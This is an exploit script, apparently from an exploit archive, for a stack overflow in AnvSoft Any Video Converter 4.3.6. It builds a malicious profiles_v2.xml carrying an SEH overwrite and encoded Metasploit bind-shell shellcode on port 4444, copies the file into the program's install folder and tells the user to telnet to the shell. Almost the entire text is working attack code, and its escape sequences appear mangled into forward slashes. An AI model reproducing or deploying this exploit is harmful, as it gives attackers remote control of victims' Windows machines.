AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit

#!/usr/bin/python # # Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow # Author: cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research # Website: http://www.spentera.com # Platform: Windows # Tested on: Windows XP SP3 # Based on POC by Vulnerability-Lab (http://www.exploit-db.com/exploits/18717/) #   import os,shutil,time,sys   def banner():     print "/n/tAnvSoft Any Video Converter 4.3.6 Stack Overflow"     print "/tbased on POC by Vulnerability-Lab (www.vulnerability-lab.com)"     print "/tcikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research/n"     print "/t----------------------------------------------------/n"   junk = "/x90" * 328 nseh = "/xeb/x06/x90/x90" seh  = "/xe4/xf3/x04/x10"   # win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com # badchars = "/x00/x0a/x0d/x22/x26/x3e" code = ("/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x49/x49/x49/x49/x49/x49" "/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x51/x48/x5a/x6a/x48" "/x58/x30/x41/x30/x50/x42/x6b/x42/x41/x58/x41/x42/x32/x42/x41/x32" "/x41/x41/x30/x41/x41/x58/x50/x38/x42/x42/x75/x59/x79/x69/x6c/x30" "/x6a/x78/x6b/x32/x6d/x78/x68/x4b/x49/x4b/x4f/x4b/x4f/x4b/x4f/x41" "/x70/x6c/x4b/x30/x6c/x51/x34/x66/x44/x6e/x6b/x72/x65/x35/x6c/x6c" "/x4b/x73/x4c/x67/x75/x30/x78/x67/x71/x68/x6f/x4c/x4b/x50/x4f/x47" "/x68/x4e/x6b/x41/x4f/x67/x50/x55/x51/x7a/x4b/x42/x69/x6c/x4b/x74" "/x74/x4c/x4b/x36/x61/x78/x6e/x74/x71/x4b/x70/x4f/x69/x6e/x4c/x4f" "/x74/x4b/x70/x70/x74/x65/x57/x4a/x61/x6b/x7a/x56/x6d/x47/x71/x4b" "/x72/x5a/x4b/x58/x74/x35/x6b/x72/x74/x75/x74/x34/x68/x30/x75/x4b" "/x55/x4c/x4b/x43/x6f/x57/x54/x36/x61/x68/x6b/x72/x46/x4e/x6b/x56" "/x6c/x30/x4b/x6e/x6b/x43/x6f/x65/x4c/x67/x71/x4a/x4b/x44/x43/x54" "/x6c/x4c/x4b/x6f/x79/x70/x6c/x74/x64/x35/x4c/x70/x61/x39/x53/x57" "/x41/x69/x4b/x50/x64/x6c/x4b/x47/x33/x70/x30/x6c/x4b/x57/x30/x76" "/x6c/x6c/x4b/x72/x50/x45/x4c/x6e/x4d/x4c/x4b/x53/x70/x43/x38/x63" "/x6e/x55/x38/x6c/x4e/x30/x4e/x54/x4e/x78/x6c/x42/x70/x69/x6f/x6e" "/x36/x53/x56/x63/x63/x70/x66/x33/x58/x54/x73/x36/x52/x53/x58/x61" "/x67/x34/x33/x57/x42/x41/x4f/x53/x64/x39/x6f/x5a/x70/x45/x38/x68" "/x4b/x7a/x4d/x39/x6c/x57/x4b/x66/x30/x6b/x4f/x49/x46/x63/x6f/x4b" "/x39/x79/x75/x65/x36/x4f/x71/x58/x6d/x47/x78/x63/x32/x70/x55/x73" "/x5a/x37/x72/x4b/x4f/x68/x50/x70/x68/x4e/x39/x74/x49/x4c/x35/x4c" "/x6d/x71/x47/x4b/x4f/x4a/x76/x32/x73/x63/x63/x50/x53/x50/x53/x31" "/x43/x52/x63/x73/x63/x47/x33/x33/x63/x59/x6f/x4e/x30/x31/x76/x30" "/x68/x77/x61/x51/x4c/x31/x76/x51/x43/x4d/x59/x6a/x41/x6f/x65/x45" "/x38/x4f/x54/x66/x7a/x50/x70/x6a/x67/x66/x37/x79/x6f/x6e/x36/x61" "/x7a/x64/x50/x33/x61/x42/x75/x69/x6f/x6a/x70/x33/x58/x4c/x64/x6e" "/x4d/x56/x4e/x39/x79/x73/x67/x4b/x4f/x7a/x76/x72/x73/x70/x55/x59" "/x6f/x58/x50/x61/x78/x6a/x45/x41/x59/x6d/x56/x42/x69/x66/x37/x4b" "/x4f/x4e/x36/x46/x30/x76/x34/x31/x44/x50/x55/x69/x6f/x4e/x30/x6e" "/x73/x75/x38/x6b/x57/x64/x39/x49/x56/x43/x49/x46/x37/x39/x6f/x4b" "/x66/x66/x35/x39/x6f/x68/x50/x75/x36/x62/x4a/x43/x54/x72/x46/x65" "/x38/x65/x33/x70/x6d/x4f/x79/x6b/x55/x32/x4a/x46/x30/x46/x39/x41" "/x39/x38/x4c/x4d/x59/x4d/x37/x41/x7a/x52/x64/x4f/x79/x6b/x52/x70" "/x31/x4b/x70/x4c/x33/x4f/x5a/x49/x6e/x77/x32/x76/x4d/x69/x6e/x31" "/x52/x64/x6c/x4e/x73/x4e/x6d/x43/x4a/x34/x78/x6e/x4b/x6e/x4b/x6c" "/x6b/x50/x68/x62/x52/x4b/x4e/x78/x33/x54/x56/x4b/x4f/x73/x45/x32" "/x64/x39/x6f/x38/x56/x61/x4b/x32/x77/x43/x62/x70/x51/x73/x61/x71" "/x41/x63/x5a/x44/x41/x31/x41/x43/x61/x63/x65/x56/x31/x6b/x4f/x4e" "/x30/x53/x58/x4c/x6d/x5a/x79/x54/x45/x58/x4e/x33/x63/x4b/x4f/x6b" "/x66/x50/x6a/x39/x6f/x4b/x4f/x70/x37/x4b/x4f/x38/x50/x4e/x6b/x62" "/x77/x49/x6c/x4c/x43/x49/x54/x43/x54/x69/x6f/x5a/x76/x56/x32/x79" "/x6f/x6e/x30/x50/x68/x53/x4e/x6a/x78/x7a/x42/x44/x33/x52/x73/x39" "/x6f/x4e/x36/x79/x6f/x68/x50/x48")   sisa = "/x90" * (1000-len(code))   poc = "<root>/n" poc+= "<categories>/n" poc+= "<category name=/""+junk+nseh+seh+code+sisa+"/" id=/"0/" icon=/"cat_all.bmp/" desc=/"All Profiles/"/>/n" poc+= "</categories>/n" poc+= "<groups></groups>/n<profiles></profiles>/n</root>/n"   file = "profiles_v2.xml" splash=os.path.abspath(file) profdir="C:/Program Files/AnvSoft/Any Video Converter Professional"   writeFile = open(file, "w") if os.name == 'nt':     if os.path.isdir(profdir):         try:             writeFile.write(poc)             banner()             print "[*] Creating the malicious",file             time.sleep(1)             print "[*] Malicious",file,"created.."             writeFile.close()             shutil.copy2(splash,profdir)             print "[*] File",file,"has been copied to",profdir             print "[*] Now open AnvSoft program and telnet to port 4444"         except IOError:             print "[-] Could not write to destination folder, check permission.."             sys.exit()     else:         print "[-] Could not find installation directory, is AnvSoft Any Video Converter installed?"         sys.exit() else:     print "[-] Please run this script on Windows."     sys.exit()